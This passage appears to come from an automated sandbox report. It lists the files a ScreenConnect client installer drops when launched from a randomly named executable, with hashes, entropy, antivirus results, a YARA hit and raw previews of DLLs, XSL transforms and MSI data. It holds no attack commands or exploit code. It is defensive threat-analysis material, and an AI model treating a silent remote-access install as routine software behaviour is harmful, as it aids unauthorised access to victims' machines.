SHA1:	C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
SHA-256:	3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
SHA-512:	4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!\|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Core.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	546304
Entropy (8bit):	6.03286879586464
Encrypted:	false
SSDEEP:	6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
MD5:	3B1BA4BEBEFDC8A95B0F2F0B4E50C527
SHA1:	15551D2E8BFB829F3A96D161B43DE820C0D417CE
SHA-256:	A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
SHA-512:	F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.InstallerActions.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.19884453207748
Encrypted:	false
SSDEEP:	384:SBHH+yElQjHVPioy4cDphaC/GeXczrMRbx1kjvdNU5yYoJ37dbr9DO:hrCtPcDCyXcMJ5yp7dbtO
MD5:	9260AFE4BBDE2549FC0B92F657C2E50A
SHA1:	5580778A62B06D7B56D3F788727514551DE31647
SHA-256:	588D3A5E1B91D3756F74EA61C9C1B5F7871AF924FAB469CEBB579F8AEB2FC135
SHA-512:	AFCE644EE04813E1E323B719E8AD3CFEFE6E20AD0AA821F1325B8E0AE0144A7CFF4E0F1F4B6F45DF33F060392F94BCFD88D62B2218FD0BC573D65A20D80E968B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....zJ..........." ..0..N.........."m... ........... ....................................@..................................l..O................................... l..8............................................ ............... ..H............text...(M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................m......H........2...9...................k........................................(....^.(......./...%...}....:.(......}....:.(......}....:.(......}........0..h.......s#......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~......"...s....%......(...+%-.&+.(.......$...s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(......{....s .....-..o!.......{....r}..p.o

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Windows.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721344
Entropy (8bit):	6.638160977312247
Encrypted:	false
SSDEEP:	24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
MD5:	D196174CF03F86C8776E717F07D5D19F
SHA1:	BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
SHA-256:	A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
SHA-512:	CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..\|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...\|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\TransformAppConfigXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5358
Entropy (8bit):	5.152842845836485
Encrypted:	false
SSDEEP:	48:6al5t7Bh14CGwFTwGqwFdwwA14XFUjF4OSMS5+ZL+FKwsiMS6g/VMS5JtD9FmoG6:6dQmN6MSzOE9FEFWFqFWcNH0eSYIZj
MD5:	8BD7F5FAA7C10C7BD3DADF217622D3C5
SHA1:	DEDA0F0C8521A9D6F94F76C528249504E0EE1FB9
SHA-256:	378CA2D1E4663403C3C43F1A4928821D9E6CF10BE535C084A23FF5B54C3B72DD
SHA-512:	0681765200BD3E5DFA81C0F2BBD156CFA70B91433DDA02F1DB0F440CB697E6399C3177B821CE62535003E9E3849D5B695E4DCAB6593CAFC70E673EEF99D2ACB5
Malicious:	false
Preview:	<xsl:stylesheet version="2.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform" ...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...exclude-result-prefixes="msxsl"..>...<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@"/>....</xsl:copy>...</xsl:template>.....<xsl:variable name="EnableGuestRequireConsentToggle" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='EnableGuestRequireConsentToggle']" />...<xsl:variable name="SupportLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='SupportLockMachineOnDisconnect']" />...<xsl:variable name="AccessLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='AccessLockMachineOnDisconnect']" />...<xsl:variable name="SupportLockMachine

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\TransformClientOverrideResx.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1135
Entropy (8bit):	5.055198370362517
Encrypted:	false
SSDEEP:	24:3qae8NW+OOt69ta9DAa9DtPMwrDAiFGrZs1BEU/q5rM/+01j:3qae8NW6SubtzAiFGrZC+IYrRqj
MD5:	7F75CED83D8C263A88A622A1E089B902
SHA1:	4C14858C78B556A0D1A02D596F74059944AE7865
SHA-256:	115937C6A57BFC17E1F9EA92C0C146DB44C803A449207FC77DD53CB0824DAA29
SHA-512:	C813C1D990DDAFE9B1A441791870A7238673E9CBA25CC044A6679EC2707323E3B91AEC6DE7CC14E434297B10DC33987D3C1FD7FDB2F742370F272C80FC01DA4C
Malicious:	false
Preview:	.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" exclude-result-prefixes="msxsl">..<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:template match="/root">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />.....<xsl:if test="count(data[@name='ApplicationDirectoryName']) = 0 and count(data[@name='ApplicationTitle']) > 0" xml:space="preserve"> <data name="ApplicationDirectoryName" xml:space="preserve">.. <value><xsl:value-of select="data[@name='ApplicationTitle']/value" /></value>.. </data>..</xsl:if>....</xsl:copy>...</xsl:template>...<xsl:template match="/root//node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@*" />....</xsl:copy>...</xsl:template>... this should be handled with the updated xsl which accounts for missing input files -->... we originally took this out because the Xsl.exe was updated to handle missing files but it seems like we still need t

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\TransformLicenseXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1768
Entropy (8bit):	5.101132156143849
Encrypted:	false
SSDEEP:	48:3qagl80iEFFrbb2FbZb0FbfeAPd5p+3FsJvP95vJ2rFuFnrRPOQR:aji3ALemVP95vH9
MD5:	258C82001204536C091D6ABF60724339
SHA1:	1C71A8427C60C962D655AD5199F1D68A049EE549
SHA-256:	C7EA7315ED86E55D841CE665C02D119D1F054F810BE7EE346A268E10F5826957
SHA-512:	3A6187B53319D096915CAACE9D65F9D40CA04EB274849D8EB4C934FF709CD02E3912C6D22AE5695B9B25FD23C86D13C1B61BD39DCBCD0AF397988AF0393CA9D6
Malicious:	false
Preview:	.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:ScreenConnect" exclude-result-prefixes="msxsl user">...<xsl:param name="licenseSignatureKey" />...<xsl:param name="licenseID" />.....<msxsl:script language="C#" implements-prefix="user" xml:space="preserve">....<msxsl:assembly name="System.Configuration" />....<msxsl:assembly name="ScreenConnect.Windows" />....<msxsl:assembly name="ScreenConnect.Server" />....<msxsl:assembly name="ScreenConnect.Core" />....<msxsl:using namespace="ScreenConnect" />....<msxsl:using namespace="System.IO" />....<msxsl:using namespace="System.Xml.Serialization" />....<msxsl:using namespace="System.Text" />........public string GenerateLicenseXml(string licenseSignatureKey, string licenseID)....{.....var license = new CloudLicense { LicenseID = licenseID };.......var envelope = new LicenseEnvelope { Contents = license };.....envelope.Sign(Convert.FromBase64String(lice

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\TransformOverriddenKeys.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	629
Entropy (8bit):	5.130173870130788
Encrypted:	false
SSDEEP:	12:yhkVRoUFLjco4IMs/XCZsDJMtR99oRXbHmiioRXbHmiHIfISdXt:KKer7n9AHvHjSXv
MD5:	31908D4B70E384C9F4D42CB05A28A73C
SHA1:	7A69055E9EB8E482C009F12CF5E555585531663B
SHA-256:	3D8138FDD91F148DE65DC062A9A4BD9781449B5D8C526157C61A04BFD86255F2
SHA-512:	ED993EB8848E144085D9335D82CBC6DFE940F6649C972EC173883486899186E94EF69992457A221B37F9BE3934B629EE7F7965C2D7C671B97DB210AC060FD589
Malicious:	false
Preview:	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">...<xsl:param name="baseFilePath" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>.....<xsl:template match="/root/data">....<xsl:if test="count(document($baseFilePath)/root/data[@name = current()/@name]) != 0 and document($baseFilePath)/root/data[@name = current()/@name]/value != current()/value">.....<xsl:copy>......<xsl:apply-templates select="node()\|@*" />.....</xsl:copy>....</xsl:if>...</xsl:template>..</xsl:stylesheet>..

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\TransformRoleXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5837
Entropy (8bit):	5.223683802415461
Encrypted:	false
SSDEEP:	48:3RW/8dr71427K9y+mXrlREtoO8gSs0e2tx4u/h0MrlGEsoi3itx4u/h0frlyEBFC:hWW0wtGtUpe2nhbjsvynhaHBGnhMBbZY
MD5:	144ADC93F53E457A1BFFA5372FD3C09B
SHA1:	6B19BB56C3C2F6E761D16D42112B57BD5E50D49E
SHA-256:	D467FE93A43F887F3F5440F9C9B9C66739DF8C064FA6A467AA102123EEDBEB4B
SHA-512:	08CA5D41C46CCD09F7FDE4EE325A38F0AE215AD9003CC9F0AF2B70AD59AC0A9995217EAC6A749E0BCFCE24AA23C0F106A42F6C4D1D367FD82429BCE4468B7487
Malicious:	false
Preview:	.<xsl:stylesheet.version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="[not(text()) and not()]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>.....<xsl:template match="PermissionEntry[@OwnershipFilter!='OwnedAndUnowned' and @AccessControlType!='Deny']" />.....<xsl:template match="@xsi:type[.='SessionOwnershipPermissionEntry']">....<xsl:attribute name="xsi:type">SessionPermissionEntry</xsl:attribute>...</xsl:template>.....<xsl:template match="@OwnershipFilter" />.....<xsl:template match="@Name[.='EndSession']">....<xsl:attribute name="Name">DeleteSession</xs

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\TransformSecurityEventTriggerXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	741
Entropy (8bit):	5.169072715134804
Encrypted:	false
SSDEEP:	12:yJ6Va8io1rO4ej+QhFLjco4IMs/XCZFr5CyWi7s/XCZDSbn:xa8ZrO4ej+4er7ftC127N8n
MD5:	41DFF6114A921D7AC5637B8AC9F04DC4
SHA1:	03880D70FA6A268C040025E90BC767D572BA36A0
SHA-256:	2CEFD9DB01C7A6F8E33A7DADBF511E963E56FF87D18064BAB2E4FE2D00A95797
SHA-512:	FE12502B10B35EF09837A8DE8CC1D7A0A67AAFBEBAF2E6911302D3E4C2F0379DFFF41B476ECBED04F24083F4B80C779F6CD19CB69633C0D6C8A3CE27ABD78958
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="[not(text()) and not()]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>..... no actual transforms for now -->....</xsl:stylesheet>..

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\TransformSessionEventTriggerXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with very long lines (14704), with CRLF line terminators
Category:	dropped
Size (bytes):	165735
Entropy (8bit):	4.0957845053651
Encrypted:	false
SSDEEP:	768:+aOZY/q3nv4eEPg8YFNHo9GHVIO35EiOGielK2pY/q3nv4eEPg8YFNHo9GHVI+3F:+aJ/CnQehCGHVt43/CnQehCGHVf1
MD5:	4D5B6FB68883C7842D5397D54E85ABC2
SHA1:	02DC58F27E440F02B5FC4872083C7DAFD2DD98C0
SHA-256:	6224B2FE77D2D9104E1BF79573CE1849C408744278DEEB198622FB28E46D80CE
SHA-512:	9398B8A85DD3B22B0F48AB05B8C9FF34C0B087BF49DF82320D93D1D52D4E26533A0EFA1BF0696DE4052A33AF0BAC824CC8A1F5998EEB5D25E438F9E4110622EF
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />...<xsl:variable name="singleQuote">'</xsl:variable>.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />....<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\TransformSessionGroupXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1564
Entropy (8bit):	5.254408929629647
Encrypted:	false
SSDEEP:	24:xa8gaRs7rO4ej+HLSEWucLxjUbNtBUU/Der7ftC127vwKwNwwkFEphRynS2n:E8gaRsTtogYq6r71427IbNxkFDSq
MD5:	26E0BFF9194950526A0BA294210BAF79
SHA1:	026D99742D35B1ECCB0DF29ECDA19CECE0387C88
SHA-256:	248DCA9B0706E95A2CBE18B4959ECCA5DFA2D4A77AADC66BF7BA9734757EF29C
SHA-512:	A3B29F916B29FE84DA5B4A9FB74BBCCB04781A0021C7C9EE4195D5D8024B9A5A7C64CDEF9AA98E10F1E68060E29E74677CD43002086FD76F3BAEB69B2147715B
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />..<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for sel

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\TransformWebConfig.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with very long lines (1649), with CRLF line terminators
Category:	dropped
Size (bytes):	42037
Entropy (8bit):	5.478811092639316
Encrypted:	false
SSDEEP:	768:E1YNsh5xxCuEfxBDyp818n4SIOaUUX4bwsfVdfdFNvwDxjLVO88RlUEjKRMX9HPk:E1VCuEfxBDyp818n4SPaUUIbwsfVdfdA
MD5:	3E2819DAE208FB16B35E83522C9E1E21
SHA1:	325D9AB2122FF9B41AE936326CD23A0CBCCD16BE
SHA-256:	6B93D87A6547CEDD4EE11EB7E9373963B89F98536A7F834D4564977306021554
SHA-512:	6D5388F35C0958ACE0EAFDF8E98A3125D2535AC25670C0E13EED6664E9D97B6B2ED48889FD07CE9B74C0E8923C0BB796C537B0F4EB5C76A85B1E24474367ED6F
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:strip-space elements="add remove httpRuntime" />...<xsl:param name="configuration" />...<xsl:param name="platform" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="version" />...<xsl:param name="utcOffsetMinuteCount" />..... NOTE: this only supports C# 2.0 and .NET Framework 2.0-->... Custom/XslScratchpad is setup with the same C#/.NET configuration to provide full IDE support, so changes should be made/tested there and then copied to this section -->...<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Collections.Generic" />....<msxsl:using namespace="System.Security.Crypto

C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi

Process:	C:\Users\user\Desktop\lat0Kwfbuj.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	11636736
Entropy (8bit):	7.964563086829888
Encrypted:	false
SSDEEP:	196608:nZs6Uruc9XbQZs6UYZs6UnZs6UvZs6UbZs6U:nnCtxbQntnEnOnkn
MD5:	B93C059F3650CC0213A005E74AB69AD4
SHA1:	9898DA3E87BD67666DFC61CB2FC62451B0870487
SHA-256:	B37CBCCDEAFDC006419B6FA2B6449447B6149E28644B80F06B9E60A46A087E5B
SHA-512:	28AF914985E665CFC6DAF3A1FBDBE0828E42BC7F0D06374503526C7BE6D56FE74440368DE6EA1504A8FB7591EEB955396A80567B6BA6760EB935767C08965B5C
Malicious:	false
Preview:	......................>...........................................................m...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\488619.msi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	11636736
Entropy (8bit):	7.964563086829888
Encrypted:	false
SSDEEP:	196608:nZs6Uruc9XbQZs6UYZs6UnZs6UvZs6UbZs6U:nnCtxbQntnEnOnkn
MD5:	B93C059F3650CC0213A005E74AB69AD4
SHA1:	9898DA3E87BD67666DFC61CB2FC62451B0870487
SHA-256:	B37CBCCDEAFDC006419B6FA2B6449447B6149E28644B80F06B9E60A46A087E5B
SHA-512:	28AF914985E665CFC6DAF3A1FBDBE0828E42BC7F0D06374503526C7BE6D56FE74440368DE6EA1504A8FB7591EEB955396A80567B6BA6760EB935767C08965B5C
Malicious:	false
Preview:	......................>...........................................................m...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\48861b.msi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	11636736
Entropy (8bit):	7.964563086829888
Encrypted:	false
SSDEEP:	196608:nZs6Uruc9XbQZs6UYZs6UnZs6UvZs6UbZs6U:nnCtxbQntnEnOnkn
MD5:	B93C059F3650CC0213A005E74AB69AD4
SHA1:	9898DA3E87BD67666DFC61CB2FC62451B0870487
SHA-256:	B37CBCCDEAFDC006419B6FA2B6449447B6149E28644B80F06B9E60A46A087E5B
SHA-512:	28AF914985E665CFC6DAF3A1FBDBE0828E42BC7F0D06374503526C7BE6D56FE74440368DE6EA1504A8FB7591EEB955396A80567B6BA6760EB935767C08965B5C
Malicious:	false
Preview:	......................>...........................................................m...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI884C.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	423744
Entropy (8bit):	6.577172033453069
Encrypted:	false
SSDEEP:	6144:IuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv0:IuH2anwohwQUv5uH2anwohwQUv0
MD5:	E6C034B21A772297DAFC1C5AFC0407BA
SHA1:	7B029679D124C7095EA51659F0443ADB9BF5CF2A
SHA-256:	84D904FDE75911AD26077BE69E3EFF2D0C183FAE9D83DF6C961872F42996C22B
SHA-512:	466334955B4E3E49ED409FAE92B33B44266346FE4F0209262102C82117E6A054148FDE15246E3248266C2FCA7E4B55FE249C1D1C00FC660639A895E6E8809078
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI884C.tmp, Author: Joe Security
Preview:	...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}^.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}f.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}c.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.@.......@.

C:\Windows\Installer\MSI888B.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	6.573348437503042
Encrypted:	false
SSDEEP:	3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
MD5:	BA84DD4E0C1408828CCC1DE09F585EDA
SHA1:	E8E10065D479F8F591B9885EA8487BC673301298
SHA-256:	3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
SHA-512:	7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../....../......./......./.....n./...../../.../....../....../..-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI8C55.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	6.573348437503042
Encrypted:	false
SSDEEP:	3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
MD5:	BA84DD4E0C1408828CCC1DE09F585EDA
